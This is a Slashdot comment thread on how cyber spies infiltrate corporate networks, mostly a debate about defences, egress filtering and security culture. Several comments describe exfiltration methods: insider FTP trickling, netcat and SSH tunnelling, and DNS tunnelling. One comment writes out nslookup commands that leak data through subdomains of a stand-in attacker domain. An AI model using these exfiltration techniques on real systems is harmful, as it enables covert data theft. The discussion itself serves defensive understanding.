How Cyber Spies Infiltrate Business Systems

snydeq writes "InfoWorld's Bob Violino reports on the quiet threat to today's business: cyber spies on network systems. According to observers, 75 percent of companies have been infected with undetected, targeted attacks — ones that typically exploit multiple weaknesses with the ultimate goal of compromising a specific account. Such attacks often begin by correlating publicly available information to access a single system. From there, the entire environment can be gradually traversed enabling attackers to place monitoring software in out-of-the-way systems, such as log servers, where IT often doesn't look for intrusions. 'They collect the data and send it out, such as via FTP, in small amounts over time, so they don't rise over the noise of normal traffic and call attention to themselves,' Violino writes. 'There's probably no way you can completely protect your organization against the increasingly sophisticated attacks by foreign and domestic spies. That's especially true if the attacks are coming from foreign governments, because nations have resources that most companies do not possess.'"

Windows is more secure than ever!

Don't use that older version, the new version of Windows is way more secure.

Re:Windows is more secure than ever!

[sopssa]

Did you notice the story is about targeted attacks? OS doesn't have much to do with those. In fact since these are companies internal networks and servers and not workstations, I suspect they actually run some UNIX variant.

Re:Windows is more secure than ever!

So, which do you work for? MS or the Chinese gov.

Re:Windows is more secure than ever!

[causality]

Did you notice the story is about targeted attacks? OS doesn't have much to do with those. In fact since these are companies internal networks and servers and not workstations, I suspect they actually run some UNIX variant.

On that one you are absolutely correct and it is good that someone pointed this out. What Unix and Unix-like systems and their users tend to be highly resistant to are the automated attacks to which Windows systems and users are often vulnerable. These include trojans, self-propogating worms and viruses, and items of that nature. In the case of an automated attack, one system (the malware) is being pitted against another system (Windows, Unix, etc). Unix and Unix-like systems and their users generally do not experience automated viruses infecting machines in the wild today. After the Morris worm they tend to have learned not to repeat the mistakes that make such things feasible.

However, a targeted attack conducted by a determined adversary is an entirely different scenario. This is not one system pitted against another system. This is an attacker using any system pitted against a defender using any system. In that sense it's more like a game of chess. There is a very real chance of the attacker prevailing. In some ways, the deck is stacked against the defender because the defender must correctly deal with all practical methods of compromise while the attacker only needs to find the one thing that was overlooked. That might be a technical attack or it might be a low-tech social engineering attack, or both.

For automated attacks you only need to be secure enough to raise the bar beyond the capabilities that can be expected from a scripted program. Since we do not have true artificial intelligence, this is feasible. For a knowledgable and truly determined adversary, what you really want is perfect security but this is not possible. The best you can do is to be so difficult to compromise that the cost of doing so is higher than anything the attacker would gain from succeeding. Even then there may be a personal vendetta that makes the attacker irrationally persist at any cost. It's an entirely different threat model.

Re:Windows is more secure than ever!

[turbidostato]

"Did you notice the story is about targeted attacks? OS doesn't have much to do with those. In fact since these are companies internal networks and servers and not workstations"

Since these are companies internal networks the best bastion to launch an attack from is oh, surprise! an internal workstation (after all they usually access the servers, don't they?) and guess what the system is most probably such a workstation's going to run? Why should I hack a server when I can easily hack a workstation (and even easier a laptop) which will trustfully gain access as expected to the servers?

Re:Windows is more secure than ever!

[mlts]

The way to protect against a dedicated attack is compartmentalization. Connectivity is important, but companies to structure not just machines, but the IT organization to resist compromise.

For example, log servers. These machines have to be *completely separated* from anything else in the company except the network. They can't use LUNs on a SAN (or else the storage admin can tamper with logs.) They can't use the corporate backup system (or else the backup admin can restore a tampered log.) They can't be run by the Windows or UNIX admins or else a compromised admin (or a blackhat) can compromise the machines, then the log server to completely hide tracks, or to perhaps cause damage. If you are running a program like Splunk, you don't run the thing on the log servers; you run it on a read-only mirror so people who have access to Splunk do not have access to tamper with the logs.

You can't "silo" the department where everyone works in little walled areas with no inter-group communication, but you have to have separation of duties so the damage done by a compromised employee can be mitigated.

Re:Windows is more secure than ever!

[sjames]

OS is not, however, irrelevant there. It's best to start with an OS that presents a minimal aspect to the attacker and that facilitates efforts to secure it. It's just that that isn't the end of the matter when the attack is directed.

Cyber Spies

[omni123]

When are we going to get over this cyber prefix bs?

A spy is a spy a spy. You don't call them "gun spies" or "explosive spies". Technology is a tool like anything else.

Re:Cyber Spies

[bsDaemon]

No, but I saw on NOVA one time that they were going to have "Astro Spies," but that satellite technology good good enough fast enough to cancel the project (Manned Orbital Lab). James Bamford who also wrote a bunch of really good books on the NSA researched the thing. But, back on topic, I think "cyber" is used to indicate that the spying isn't being done in "meat space" as the kids say. Why it isn't just deemed a logical extension of signals intelligence, or just calling it "hacking" like they used to, is somewhat of a mystery however.

Re:Cyber Spies

[teh+moges]

I like your idea of calling non-cyberspies 'meatspies' from now on.

Re:Cyber Spies

I like your idea of calling non-cyberspies 'meatspies' from now on.

though he may have inspired that idea in you, he did not put forth that idea. therefore it is not his idea but it may be yours.

specifically you inverted his idea. you read "cyber indicates that the spying isn't being done in 'meat space'" and made it into "meat indicates that the spying isn't being done in cyber space" which leads naturally to meatspies if there are cyberspies.

jackass.

Re:Cyber Spies

[RJFerret]

When are we going to get over this cyber prefix bs?

Yes, let's get with the modern era and lingo, they will henceforth be known by the friendlier tech term: iSpy.

Re:Cyber Spies

[Trepidity]

Here's what Ted Nelson had to say about it:

"Cyber-" means 'I do not know what I am talking about'

"Cyber-" is from the Greek root for "steersman" (kybernetikos). Norbert Wiener coined the term "cybernetics" for anything which used feedback to correct things, in the way that you continually steer to left or right to correct the direction of a bicycle or a car. So "cybernetics" really refers to control linkages, the way things are connected to control things.

Because he was writing in the nineteen-forties, and all of this was new, Wiener believed that computers would be principally used for control linkages-- which is if course one area of their use.

But the term "cybernetics" has caused hopeless confusion, as it was used by the uninformed to refer to every area of computers. And people would coin silly words beginning with "cyber-" to expand ideas they did not understand. Words like "cyberware", "cyberculture", "cyberlife" hardly mean anything. In general, then, words beginning with "cyber-" mean "either I do not know what I am talking about, or I am trying to fool and confuse you" (as in my suggested cybercrud).

Re:Cyber Spies

water skiing, water polo
chocolate milk, chocolate cake

juxtapose "terrorist"

what kind? is the prefix not important? when are we going to get over this generalization bs? or are you suffering from the media's overuse and imprecision (irony) of the term? Many are not cyber-savvy, and sometimes people have to provide a best-guess in order to attempt precision.

Re:Cyber Spies

The difference, I think, is in that *cyber* spies use exclusively attacks from the digital world, as opposed to the real world (IRL spies / Cyber spies, not gun spies / cyber spies)

Re:Cyber Spies

[Sr.+Zezinho]

So cybersex is an example of proper usage of the prefix?

Re:Cyber Spies

So cybersex is an example of proper usage of the prefix?

Unless it's with a doll, in which case no feedback is going on. And knowing Slashdot...

Re:Cyber Spies

[tehcyder]

Sir, we've got them surrounded. They're in a meatspies sandwich.

Re:Cyber Spies

[gtall]

To go back further, it was called "cracking". "Hacking" was reserved for taking a program and modifying it or merely writing a program, there was no malfeasance implied.

Re:Cyber Spies

[bsDaemon]

Well, the media seems to have always lumped it in as hacking, hence the air quotes. The media and the people who want to get air time are also the ones pushing this "cyber" crap. Although, the military now has its "Cyber Command" (whatever that is, but apparently the Director of the NSA gets to be in charge of it, too). Its spreading.

Re:Cyber Spies

[MasterOfMagic]

SANDVICH IS CREDIT TO TEAM!

Re:Cyber Spies

[Monchanger]

"Cyber spies" use social methods (e.g. social engineering) which are not technological in nature. The term isn't meaningful except to explain that computers are used in the attack given how skewed public perceptions of the word "spy" are towards 007.

Re:Cyber Spies

[sbjornda]

So cybersex is an example of proper usage of the prefix?

Are you thinking it's proper because of the gp's statement about

linkages

or his phrase

I do not know what I am talking about

?

--
.nosig

Re:Cyber Spies

+1 Funny/Insightful?

Article says to do it in-house?

[Meshach]

From the FA:

If your company has the resources and the expertise, consider developing your own specialized tools to help thwart attacks.

Unless your company is a security or firewall provider I find it hard to believe that anything developed in-house will be better than a commercially available product.

Re:Article says to do it in-house?

[shaitand]

Yes it will. Hackers/Hacking organizations have limited resources just like companies do. They spend their time finding and educating themselves on exploits in the most popular commercially available products because it yields the most bang for the buck.

In fact, many of these attacks begin with a scan to seek out vulnerable software.

Re:Article says to do it in-house?

Thwarting... LIKE A BOSS

Re:Article says to do it in-house?

[BraksDad]

It is not the developed software, it is the data, particularly data related to bids and development.

Clearly...

[Darkness404]

Clearly they infiltrate them by sapping their sentries.

Oh noes!

[countSudoku()]

The packets are coming from INSIDE YOUR NETWORK!!1! GET OUT FAST!!1!

Seriously, just fire up nmap and start scanning your internal work networks and some key systems. If the security and network admins don't show up in your cube within 30 minutes, you might have a problem that no amount of products from CA/Symantec could ever hope to solve. Yet, they WILL sell them to you nonetheless.

Knowledge beats paranoia
Spock smashes Scissors and vaporizes Rock

Your mileage may vary.

Re:Oh noes!

What about paper?

Re:Oh noes!

[Lord+Ender]

Our network admins would catch you, but only because our firewalls go down when you portscan through them :-(

Re:Oh noes!

Vulcans never invented paper, went straight to digital.

Paper totally pwns vulcans. It's ugly logic, and it works.

Re:Oh noes!

There is no paper. It's all electronic now.

Re:Oh noes!

Unrecognised MAC addresses seem to be investigated fairly promptly round here :-)

Still, weakest link here is the password which we have to change every month. Coming up with a strong password and remembering it every month is not easy, so my last one (now replaced) was Sn0wSn0w. The new one isn't SunSun or even RainRain though :-)

Re:Oh noes!

[sbjornda]

Seriously, just fire up nmap and start scanning your internal work networks and some key systems.

If you try that in my shop you will be violating written policy and we will escort you to the door.

--
.nosig

Re:Oh noes!

[shentino]

Maybe for powerless serfs that USE the machines, but surely not sysadmins?

Thought of this sort of thing in 2004

[StCredZero]

I thought of this sort of thing in 2004 with some coworkers. The scenario we came up with would be for a disgruntled employee to query trading app databases (unencrypted) and export the data in dribs and drabs using FTP. Outgoing FTP was wide open. The place where we were working (major petroleum multinational) the information could have been used by competitors to make a killing doing commodity trading, possibly even corner a market.

The problem's not the technology. There's always security holes. It's relatively easy to get your hands on something illegally. It's safely making money off of it which is the problem. No way I'd want the kind of heat a major petroleum multinational could hire going after my ass!

Re:Thought of this sort of thing in 2004

[bsDaemon]

I know... they might upload a virus into their shipping fleet's ballast control computers and blame it on you so the government can trash your shit for them. But it should all work out in the end, though, and you'll get the girl.

Re:Thought of this sort of thing in 2004

I thought they steal your best friends code and beat him to death, still get the girl in the end though.

Re:Thought of this sort of thing in 2004

[StCredZero]

Actually, a whole bunch of people I've worked with have worked on apps that route global shipping fleets. Ballast is controlled by a local, non-networked shipboard mechanisms.

Re:Thought of this sort of thing in 2004

I thought they just /* TODO: joke about BP oil spill 2010 goes here */

Re:Thought of this sort of thing in 2004

[bsDaemon]

thank you for ruining my "hackers"-based joke attempt.

Re:Thought of this sort of thing in 2004

LOL so LOL .

what are you doing against apps like TOR ? external proxies ? How many admin accounts are drooling around on the clients? How many notebooks go out everyday without full HDD encryption and connect to your network from their homzes without IPSEC or secure protocals? How many have corporate cell phone that connect to your email systems imap/pop without the IT department vouching for it ? SO secure yet unsecure.It does not only take a disgruntled employee.

Re:Thought of this sort of thing in 2004

[StCredZero]

LOL so LOL

Clueless, so clueless. Yes, getting some kind of data out of a corporation is easy, and can be done with a flash drive/laptop/etc... Getting data on every single petroleum product trade done by a large multinational in near-realtime is a little bit more demanding and useful. As it so happens, there's a good number of devs with access to the databases, and with the ability to run a daemon which could send the data out over FTP. (It's not that much data, actually.) The disgruntled employee (the right particular one) is the perfect one to pull exactly this off.

Re:Thought of this sort of thing in 2004

I got it. ;)

HACK THE PLANET1

fire up nmap and start scanning (Re:Oh noes!)

[StCredZero]

Seriously, just fire up nmap and start scanning your internal work networks and some key systems. If the security and network admins don't show up in your cube within 30 minutes, you might have a problem that no amount of products from CA/Symantec could ever hope to solve.

Four jobs ago, I used to fire up nmap and scan the internal network, then tell the network admins where the trojans were! (No, I never put them there.)

Re:fire up nmap and start scanning (Re:Oh noes!)

[mandelbr0t]

Four jobs ago, I used to fire up nmap and scan the internal network, then tell the network admins where the trojans were! (No, I never put them there.)

That would explain why it was four jobs ago...

Wait what?

[moogied]

Maybe its because I work for a large state's DOJ... but whos firewalls are just letting out random FTP connections? In our environment nothing goes in or out unless we directly state it should be. Its all very controlled... that and a pretty hefty usage of enterprise level AV scans on each box, then IDS, then AV on emails, filtering on emails(can only go to certain addresses).. etc etc. I guess we take the "Large amount of work in exchange for very tightly controlled systems" approach. Maybe other places should too?

Re:Wait what?

Because it is not possible to setup a SSH tunnel? Or even embed information in webforms? Hell, it doesn't matter if you scan everything. One can move data out via DNS queries - can you stop 1 or 2 DNS queries an hour? Sure, that is a "small" info leak, but if you are looking for simply "Y" or "N" to some info search, it's more than good enough.

It is very possible to install undetected malware in a secure network, but you need to know the policies of such a network. That's it.

Re:Wait what?

[shaitand]

These days I work for a network security monitoring company. We have only fortune 500 customers and a number of large state organizations.

All I can say is ROFL. That made my day, really, it did it made my day.

State is even worse than corporate and corporate is bad enough. They have so many ridiculous security policies mandated while leaving gaping holes the size of Texas open. It's all about keeping the illusion of security really.

We have live security staff monitoring their systems and we do it. We monitor and in some cases manage firewalls and have IDS/IDP systems in place and we monitor those as well. Additionally, we sell security and some enterprise grade network gear.

So here is how it goes. An IDS at undisclosed location flags a SQL attack sequence in the form on a major website. We get the alert, determine a complex SQL sequence in network traffic is pretty distinct and not usually a false positive.

So I put down my putting iron and run to the phone to notify the customer during the 15 minute SLA.

Joe "This is Joe, help desk, may I have your name?"

Me "Hey Joe, this is lord vader at company x. We have detected an attack in your network stream. Our automated systems detected and blocked this attack but we highly recommend having the appropriate admins check your web/SQL servers and firewall logs for any suspicious activity."

Joe "I'm not really sure what all that means but I'll submit a ticket."

24 hours later I get a notification that Joe closed his ticket, there are no updates from any admins.

It's a joke, most companies think that having 'enterprise' AV means they don't have viruses/malware and having IDS means they are safe from network attack. They think having overzealous security policy means they are secure.

The reality is no automated system replaces attentive personal and any security policy that interferes with day to day business will be bypassed in some fashion or worked around at any opportunity.

Another example from back when I did service work. We had a bank call us. They were just inspected and the security inspector told them they had to have a firewall with intrusion detection. They called us because they had to be in compliance. They basically had NO security and no a single firewall in the shop. They even had remote access setup on systems with modems on the banking network!

So we prepare a proposal that would get them a solid firewall and an intrusion detection system and lock down the glaring security holes.

They turn us down. Instead they bought one copy of Norton Internet Security and installed it on a system. Technically, they had a firewall that lists intrusion detection as a feature now and this brought them into compliance.

Re:Wait what?

Maybe its because I work for a large state's DOJ... but whos firewalls are just letting out random FTP connections?

Maybe it's because you work for a large state's DOJ that you don't recognize that any reasonably smart piece of software would attempt to transmit information on a selection of available ports via a number of recognized protocols. You let out HTTP, don't you? How well do you suppose that is filtered? And even if it is, do you know how difficult it would be to distinguish between someone uploading a picture of their dog to their own personal blog and someone uploading a sensitive PDF (or even text) to some random website if the contents were both MIME-encoded and/or encrypted?

Re:Wait what?

[Ostracus]

Maybe its because I work for a large state's DOJ...

Prosecuting any powerful people or dealing with large sums of money?

Maybe other places should too?

Is the public at large willing to shoulder the cost, especially considering most don't understand the threat?

Re:Wait what?

[jeff4747]

Replace "FTP" in the example with "HTTP" or "HTTPS". Still sure you're covered? Do you have to explicitly whitelist every web site you can access from work? Even then, are you sure every web site on your whitelist is absolutely secure?

Re:Wait what?

[Lord+Ender]

To be fair, an unsuccessful attack on a web server from the Internet is as common as breathing these days. What do you expect people to do? If I chased all of those down, I would never ever get to do anything else ever.

Re:Wait what?

[shaitand]

I suppose that would depend on whether you are security staff getting paid to do nothing else, ever.

Re:Wait what?

It depends on where the mysterious SQL sequence was detected - on the HTTP side of the web application or the SQL side.
I'd worry a lot if it was on the SQL side, even if I made sure my web application was running with minimum privilege access to the database. So few do even that!

Re:Wait what?

It's a joke, most companies think that having 'enterprise' AV means they don't have viruses/malware and having IDS means they are safe from network attack. They think having overzealous security policy means they are secure.

As a person who has pen-tested Banks, I can vouch for this from the other side. A couple of years ago I pwned one Fortune 500 Bank in 30 hours (less than two business days) - all nix back-ends, full DBA access, and Forest Admin giving me full Wintel control; no logs, no events, no alarms. All from the same level of access as a cleaner (black-box test - no accounts, no systems access, physical access to an Ethernet port in an administrative building - brought my own laptop).

I was blown away when the administering Risk Officer couldn't work out how jacking into the ethernet network and obtaining an IP address was possible, because I didn't login to the "LAN" (i.e. I didn't use his Active Directory to login to my desktop).

I personally think that the vendors have a lot to answer for; for this level of market stupidity / ignorance. There's an ethical obligation in the commercial security sector that has been completely ignored, to the detriment of almost everything else.

Re:Wait what?

[pnutjam]

If I am controlling both the sending and receiving computer I can use any port I want, there are even tools for windows that allow this, but it's trivial in linux. I can just pipe data out port 80 using netcat.

Re:Wait what?

My boss forces static IP's for all devices in the name of security. But we are on a /16 network for about 500 machines at over a dozen sites of different sizes.

I am trying to explain how such a flat network opens us up to internal security risks as well as broadcast errors and static IP's are security through obscurity only. I can list at least 3 better ways to keep rogue systems off the network, and simplify the workload that static IP's create.
Too bad I'm the new guy, maybe they will listen soon.

global search and replace

[khasim]

s/cyber/blogosphere/g

Amazingly enough, it has the exact same relevance.

undetected attacks

[Gitcho]

According to observers, 75 percent of companies have been infected with undetected, targeted attacks

anyone else wonder how that's measurable?

Re:undetected attacks

[Capt.+Skinny]

I suspect they meant "heretofore undetected." As in, the sysadmins didn't catch it but the security consultants did.

Commercial? LOL !!!!

[khasim]

We use a 3rd party to monitor our sites and their IDS device runs snort.

The best stuff out there is Open.

TWO way firewall

[Archangel+Michael]

One of the best ways to prevent (at least partially) such a compromise is to establish a two way firewall, one that blocks outbound traffic from applications not authorized to send data.

Next, I'd incorporate a DMZ for general computers, making sure that there are no unauthorized computers on the network.

Servers would all communicate via encrypted traffic to only designated computers in the DMZ. ANY other traffic would sound alarms.

Random forensic examination of user computers and adding in regular re-imaging of desktops will help keep already compromized machines to a limited number. And I've also noticed that it also cuts down the number of "customizations" people make to their workstations.

Proper segmentation of network processes will help prevent (not KEEP) data from escaping. Compromised (hacked or 1D10T) computers are always going to be problematic.

Are admin/security people really this ignorant?

Only noobs allow external DNS queries to internal machines. Seriously.

DNS to the outside world should not be allowed from inside a company if you want security. Obviously, the proxy servers will need external DNS, but desktops do not.
The default route for the internal network needs to go through a tightly controlled set of proxies. Direct IP address access to the public internet is for noobs too.

Are admin/security people really this ignorant still?

Sure, you can tunnel ssh externally by sending it on port 443, but when the traffic pattern doesn't match web traffic, gotcha.

It is much easier to bring in a 32GB SDHC card, drop it into a desktop/laptop and perform a SQL dump.

Re:Are admin/security people really this ignorant?

[turbidostato]

"Sure, you can tunnel ssh externally by sending it on port 443, but when the traffic pattern doesn't match web traffic, gotcha."

You know you can funnel *any* kind of traffic under HTTPS don't you? So unless you block *all* traffic except whitelist (and I don't know of any company that would burden so much their bottom line) you are already doomed.

But, well, having people that gladly works with you instead of the competition is so against corporate America's style, isn't it?

Hmmm, 75% of companies?

[Gavin+Scott]

"According to observers, 75 percent of companies have been infected with undetected, targeted attacks"

These "observers" wouldn't happen to be people with a vested interest in the cyber-security industry would they?

This sounds a lot like "75% of the population has an undetectable terminal disease with no symptoms and so everyone needs to buy our miracle cure right away!"

Or Dogbert has upgraded his invisible robots...

http://www.hulu.com/watch/78089/dilbert-animated-cartoons-invisible-robot

Color me skeptical on this claim.

G.

Anywhere that deals with large files

[dbIII]

Anywhere that deals with large files allows "random" FTP connections so employees can pick up data from clients. Email is a crappy way to send large files so FTP still fills the gap. Using something like sftp would of course be vastly better but not many people even know it exists.

Re:Anywhere that deals with large files

[soliptic]

Email is a crappy way to send large files so FTP still fills the gap.

That's not exactly a great justification for "random" FTP connections.

At my place I have a legitimate need for FTP, so do a few other people. These people submit a business case to IT and get FTP access. Everybody else does not. It may also be limited to specific sites, I'm not sure.

Btw (and I probably shouldn't say this, considering I'm going through their proxy, and they are probably reading this) - this is coming from a company whose IT dept appear to consider "reboot the server" as a decent first line of problem-solving for pretty much any ticket I submit, even ones where I carefully spell out that it's a client-side issue. So it can't exactly be rocket science to limit FTP to those who need it.)

Re:Anywhere that deals with large files

[IICV]

You wouldn't believe the number of people who think you can use Internet Explorer to access an SFTP or FTPS site. It's not even funny.

Of course, Internet Explorer itself doesn't help - if you click on a link in the form of "sftp://" or "ftps://", IE goes "oh hey I know how to handle this!" and tries to open it even though it has no idea what it's doing.

And of course, the users don't realize that there's a difference between FTP and SFTP/FTPS, so they say "hey why do I need to download some other program? Internet Explorer works just fine for all those other sites!"

Honestly, one thing that would make my life vastly easier is if Microsoft released an update to IE that allowed it to understand FTPS (which is the secure FTP protocol MSFT pushes in IIS 7.5, so why not?).

Re:Anywhere that deals with large files

[dbIII]

Yes it is. That's how large tender documents travel due to a habit of clients or their hosting services setting email attachment sizes to ridiculously low values.

All this handwringing about security is amusing

[mikein08]

As long as you have a system which is open to the outside world, it can never be secure. As long as your systems which are open to the outside world are running on insecure OSes - Unix, Linux, anything written by Microsoft - your systems will not be secure. This is the long and short of it. But American corporations, and most governmental entities, are either (1) stupid, (2) incompetent, (3) unconcerned about security, or some combination thereof. Which is good if you are a security contractor/specialist. It keeps you employed, and at good wages. Which, after all, is the object of the game, isn't it?

Re:All this handwringing about security is amusing

Actually, in a lot of companies, the attitude is "security has no ROI". Because the PHBs don't see it giving any financial gains, it gets skimped on.

I've seen this in medium sized businesses, and I've seen this in small businesses, where they don't want to go WPA2 because their console in the breakroom would have to be reconfigured. Even if all it would cost is one AEBS (or a decent firewalling router/AP) so the console is on a public network with zero access to the internal machines.

The ONLY thing that will get a lot of businesses to care enough to shut their barn doors while the animal is still present is regulation saying that lack of security == time in a PMITA prison.

Believe it or not, government is learning this. The public sector is doing a serious movement to make sure that things are locked down tightly. The private sector needs to follow suit.

.EDU laundering data for Medical Marijua shops

[turtleshadow]

I recently arrived as the "paid IT guy" at a small private university.

I just took as fact that systems were already being attacked and rooted.

Educational systems which nobody thinks twice about are already owned and have the least chance to fight off any concerted state or insert group name here sponsored attack.
Its now a nice game of wack a mole as I watch the firewalls which now have egress logging on ports. Its interesting to see the "businesses" that connect to my systems daily.
Nobody filters out going to a .edu domain from a business -- Oh its great my employees take online classes or want to go back to school!

Thus far the best scam I've seen attacking businesses directly is the Medical Marijuana Shops that snap up Point of Sale systems (pre rooted of course) from craigslist or ebay.
The data on customers, EFTs, .gov Benefit, state ID info info and all that gets laundered through .edu then to the mafias botnets. The smarter scams encrypt the flow now.

I'm sure some cancer patients have died naturally but .gov is still paying benefits through that scam.

Caveat Emptor

resources businesses don't possess

Unlimited tax-payer funding for hardware, a steady income for snacks and toys, and the governmental "get-of-jail-free" card for doing evil things to other people's systems. Is there anything more a cracker needs? Old crackers, who are good at what they do, get a bunch of minions to abuse (mentor) and a retirement fund. Governments aren't magic, they just give themselves permission to do things that they do not allow others to do.

Re:Are you really that ignorant?

c:\> nslookup data01.anoncoward.doesnt.understand.myevildomain.com
c:\> nslookup data02.would.the.external.attacker.teleport.that.sdhc.card.myevildomain.com
c:\> nslookup data03.or.what.myevildomain.com

Unless your caching nameservers have whitelisted the domains they'll query ("Sorry, Dave, we haven't seen that domain name before. You may not email that address." ??), DNS is a very reliable way of exporting data, especially small quantities.

two kinds of security?

[kubitus]

"'There's probably no way you can completely protect your organization against the increasingly sophisticated attacks by foreign and domestic spies. That's especially true if the attacks are coming from foreign governments, "

?

what makes you think that the same action by your very own government is not an attack?

Recently a lot of IT managers of the UN system coming from the US exclusively install US-company based products which ( would ) give US based services a nice backdoor to their IT systems.

As many co-posters mentioned: it is the security alertness of staff which decides.

Best thing to do IMHO:

discuss security open in the company with all implications!

Take Open Source solution - or second best - a Proprietary one. PLUS think up of something unique additionally. ( For this the Open Source is better )

Oh, FFS

[cheros]

Someone in need of some new fear? Products to sell or a new restrictive law coming up? Journo in need of hits?

1 - Secure what are secrets, and please lose the idea that security is a technical problem. It's a people problem first. You have information because you work with it, and anyone able to access that data as part of their work is a potential leak in itself.

2 - Any observation takes effort, so espionage is typically focused - stay alert if you're doing something interesting.

3 - The more data you collect, the larger the haystack becomes for a needle to hide. What happened in 9/11 demonstrated quite clearly that HUMINT is the best, but is a lot more costly. The TSA kindly proved afterwards that doing it any other way is just a way to make a couple of people very rich, but it won't contribute to security. Oh, and it proved that you don't even need to go abroad to find an untrustworthy government..

4 - Stop worrying people about what can go wrong. Every time of the day we are exposed to threats. The builder may have used asbestos, some driver may be on drugs and run you over, your secretary may start leaking data about your affair - prevent what you can, and plan for what you cannot, then get on with your life.

5 - If you want security checked, use an expert. And by that I don't mean someone who can wave some certification around, that is great for clueless HR types to avoid blame for picking the wrong person, READ the CV. The good ones LIVE their work, and not all of them have bothered getting certified. Check, check again, and if it's critical have the work cross checked with someone else. Do NOT expect consultancies to be better or worse, I have seen risk management done by a Big Name setup that wasn't worth 1/10th of what a client paid for it and actually put lives at risk if there had been a crisis. Ditto with security.

6 - Remember the law. If you let your security be tested by a setup that has been put under order to report back (UK Regulation of Investigative Powers Act springs to mind) you have just given a list of weaknesses to that same government you were so worried about. It may pay to look abroad, where such reports will have to be stored properly and cannot be accessed other than by leaving a paper trail.

Just don't think that buying a lot of kit will sort it all out, or that there is such a thing as risk free operations. Plan for failure so you can deal with it if it happens and. do. not. forget. the. people. in. this. effort..

Re:Oh, FFS

[mikein08]

Spot on, brother. But as I have said, ANY system open to the outside world will NEVER be secure.

Re:Oh, FFS

[cheros]

You're right. But it would be nice if idiots stopped whining about it as if that is news. You need it, because having it brings more profit than running it plus the cost of managing the risks - simple business calculation, and there isn't much more to it. I'm fed up with the BS spouted by journalists and consultancies keen to flog the most expensive advice they can get away with. It's not magic..

Chinese use USB keyfobs against British execs

[yuna49]

http://www.timesonline.co.uk/tol/news/uk/crime/article7009749.ece

"A leaked MI5 document says that undercover intelligence officers from the People's Liberation Army and the Ministry of Public Security have also approached UK businessmen at trade fairs and exhibitions with the offer of "gifts" and "lavish hospitality".

The gifts -- cameras and memory sticks -- have been found to contain electronic Trojan bugs which provide the Chinese with remote access to users' computers. "

Ah, good old autoplay!